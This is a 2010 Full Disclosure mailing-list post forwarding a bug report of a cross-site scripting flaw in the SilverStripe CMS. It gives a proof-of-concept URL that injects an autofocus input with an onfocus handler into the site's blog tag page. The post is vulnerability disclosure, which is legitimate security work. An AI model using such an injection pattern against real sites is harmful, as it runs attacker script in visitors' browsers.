Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Fwd: xss in silverstripe

From: dave b <db.pub.mail () gmail com>
Date: Mon, 4 Oct 2010 14:03:04 +1100
Bugtraq seem to be having problems :/ (this is the only reason I sent
this to full disclosure I don't like wasting people's time with xss on
this list).


---------- Forwarded message ----------
From: dave b <db.pub.mail () gmail com>
Date: 4 October 2010 13:48
Subject: xss in silverstripe
To: bugtraq () securityfocus com


Look I know xss are lame but silverstripe is vulnerable ...

http://www.silverstripe.com/blog/tag/%20%3Cinput%20type=%22text%22%20AUTOFOCUS%20onfocus=alert%281%29%3E

I love html5!

--
The better part of valor is discretion.         -- William
Shakespeare, "Henry IV"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: